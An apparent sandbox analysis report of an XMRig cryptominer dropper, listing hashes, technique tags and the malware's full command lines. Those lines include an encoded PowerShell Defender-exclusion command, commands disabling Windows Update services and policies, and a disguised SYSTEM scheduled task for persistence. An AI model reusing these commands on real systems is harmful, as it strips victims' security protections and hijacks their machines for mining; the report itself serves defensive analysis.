xmrig | 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

General

Target

minfx.exe
Size

4.2MB
MD5

8268ff95b3aaea6d6de8f02a73c323d2
SHA1

ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256

529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA512

9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Score

10^/10

xmrig discovery evasion exploit miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3008-208-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/3008-209-0x000000014036DAD4-mapping.dmp	xmrig
behavioral2/memory/3008-210-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/3008-211-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/3008-213-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1276 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

4400 takeown.exe
5000 icacls.exe
1124 takeown.exe
496 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

4400 takeown.exe
5000 icacls.exe
1124 takeown.exe
496 icacls.exe

pid	process
1276	updater.exe

pid	process
4400	takeown.exe
5000	icacls.exe
1124	takeown.exe
496	icacls.exe

pid	process
4400	takeown.exe
5000	icacls.exe
1124	takeown.exe
496	icacls.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.exe

description	pid	process	target process
PID 3424 set thread context of 3136	3424	conhost.exe	conhost.exe
PID 3424 set thread context of 3008	3424	conhost.exe	explorer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5004 schtasks.exe

pid	process
5004	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exeexplorer.exe

pid	process
4892	powershell.exe
4892	powershell.exe
3988	conhost.exe
3576	powershell.exe
3576	powershell.exe
3424	conhost.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe
3008	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

664

pid	process
664

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

powershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	3988	conhost.exe
Token: SeShutdownPrivilege	1148	powercfg.exe
Token: SeCreatePagefilePrivilege	1148	powercfg.exe
Token: SeShutdownPrivilege	4408	powercfg.exe
Token: SeCreatePagefilePrivilege	4408	powercfg.exe
Token: SeShutdownPrivilege	4392	powercfg.exe
Token: SeCreatePagefilePrivilege	4392	powercfg.exe
Token: SeShutdownPrivilege	1388	powercfg.exe
Token: SeCreatePagefilePrivilege	1388	powercfg.exe
Token: SeDebugPrivilege	3576	powershell.exe
Token: SeDebugPrivilege	3424	conhost.exe
Token: SeShutdownPrivilege	2920	powercfg.exe
Token: SeCreatePagefilePrivilege	2920	powercfg.exe
Token: SeShutdownPrivilege	2968	powercfg.exe
Token: SeCreatePagefilePrivilege	2968	powercfg.exe
Token: SeShutdownPrivilege	3312	powercfg.exe
Token: SeCreatePagefilePrivilege	3312	powercfg.exe
Token: SeShutdownPrivilege	1380	powercfg.exe
Token: SeCreatePagefilePrivilege	1380	powercfg.exe
Token: SeLockMemoryPrivilege	3008	explorer.exe
Token: SeLockMemoryPrivilege	3008	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

minfx.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 888 wrote to memory of 3988	888	minfx.exe	conhost.exe
PID 888 wrote to memory of 3988	888	minfx.exe	conhost.exe
PID 888 wrote to memory of 3988	888	minfx.exe	conhost.exe
PID 3988 wrote to memory of 1700	3988	conhost.exe	cmd.exe
PID 3988 wrote to memory of 1700	3988	conhost.exe	cmd.exe
PID 1700 wrote to memory of 4892	1700	cmd.exe	powershell.exe
PID 1700 wrote to memory of 4892	1700	cmd.exe	powershell.exe
PID 3988 wrote to memory of 4476	3988	conhost.exe	cmd.exe
PID 3988 wrote to memory of 4476	3988	conhost.exe	cmd.exe
PID 3988 wrote to memory of 4536	3988	conhost.exe	cmd.exe
PID 3988 wrote to memory of 4536	3988	conhost.exe	cmd.exe
PID 4476 wrote to memory of 5044	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 5044	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 3052	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 3052	4476	cmd.exe	sc.exe
PID 4536 wrote to memory of 1148	4536	cmd.exe	powercfg.exe
PID 4536 wrote to memory of 1148	4536	cmd.exe	powercfg.exe
PID 4476 wrote to memory of 1864	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 1864	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 3664	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 3664	4476	cmd.exe	sc.exe
PID 4536 wrote to memory of 4408	4536	cmd.exe	powercfg.exe
PID 4536 wrote to memory of 4408	4536	cmd.exe	powercfg.exe
PID 3988 wrote to memory of 3188	3988	conhost.exe	cmd.exe
PID 3988 wrote to memory of 3188	3988	conhost.exe	cmd.exe
PID 4536 wrote to memory of 4392	4536	cmd.exe	powercfg.exe
PID 4536 wrote to memory of 4392	4536	cmd.exe	powercfg.exe
PID 4476 wrote to memory of 1508	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 1508	4476	cmd.exe	sc.exe
PID 3188 wrote to memory of 5004	3188	cmd.exe	schtasks.exe
PID 3188 wrote to memory of 5004	3188	cmd.exe	schtasks.exe
PID 4476 wrote to memory of 4136	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 4136	4476	cmd.exe	sc.exe
PID 4536 wrote to memory of 1388	4536	cmd.exe	powercfg.exe
PID 4536 wrote to memory of 1388	4536	cmd.exe	powercfg.exe
PID 4476 wrote to memory of 3352	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 3352	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 4144	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 4144	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 4540	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 4540	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 2364	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 2364	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 2496	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 2496	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 2392	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 2392	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 2664	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 2664	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 3872	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 3872	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 4740	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 4740	4476	cmd.exe	sc.exe
PID 4476 wrote to memory of 4400	4476	cmd.exe	takeown.exe
PID 4476 wrote to memory of 4400	4476	cmd.exe	takeown.exe
PID 4476 wrote to memory of 5000	4476	cmd.exe	icacls.exe
PID 4476 wrote to memory of 5000	4476	cmd.exe	icacls.exe
PID 4476 wrote to memory of 4768	4476	cmd.exe	reg.exe
PID 4476 wrote to memory of 4768	4476	cmd.exe	reg.exe
PID 4476 wrote to memory of 1404	4476	cmd.exe	reg.exe
PID 4476 wrote to memory of 1404	4476	cmd.exe	reg.exe
PID 4476 wrote to memory of 1564	4476	cmd.exe	reg.exe
PID 4476 wrote to memory of 1564	4476	cmd.exe	reg.exe
PID 4476 wrote to memory of 2748	4476	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\minfx.exe
"C:\Users\Admin\AppData\Local\Temp\minfx.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
3⤵
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4476

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:5044

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:3052

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:1864

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:3664

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:1508

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:4136

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
4⤵
PID:3352

C:\Windows\system32\sc.exe
sc config bits start= disabled
4⤵
PID:4144

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
4⤵
PID:4540

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
4⤵
PID:2364

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
4⤵
PID:2496

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
4⤵
PID:2392

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
4⤵
PID:2664

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:3872

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
4⤵
PID:4740

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4400

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5000

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
4⤵
PID:4768

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
4⤵
PID:1404

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
PID:1564

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
PID:2748

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
PID:404

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
PID:2152

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
4⤵
PID:3296

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
4⤵
PID:2940

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
4⤵
PID:3552

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
4⤵
PID:4228

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
4⤵
PID:1980

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2808

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:4536

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1148

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
- Creates scheduled task(s)
PID:5004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
3⤵
PID:4804

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
4⤵
- Executes dropped EXE
PID:1276

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
6⤵
PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:4312

C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
PID:4512

C:\Windows\system32\sc.exe
sc stop bits
7⤵
PID:868

C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
PID:4468

C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
PID:1592

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
PID:3524

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
7⤵
PID:3420

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
7⤵
PID:4460

C:\Windows\system32\sc.exe
sc config bits start= disabled
7⤵
PID:1244

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
7⤵
PID:1004

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
7⤵
PID:4572

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
7⤵
PID:4760

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
7⤵
PID:4120

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
7⤵
PID:1096

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
7⤵
PID:1724

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
7⤵
PID:3568

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1124

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:496

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
7⤵
PID:2952

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
7⤵
PID:3892

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
PID:4012

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
PID:3872

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
PID:2672

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
PID:2340

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
7⤵
PID:1744

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
7⤵
PID:672

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
7⤵
PID:1764

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
7⤵
PID:112

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
7⤵
PID:4076

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:4884

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:32

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
6⤵
PID:4196

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3312

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
6⤵
PID:3136

C:\Windows\explorer.exe
C:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008

Network

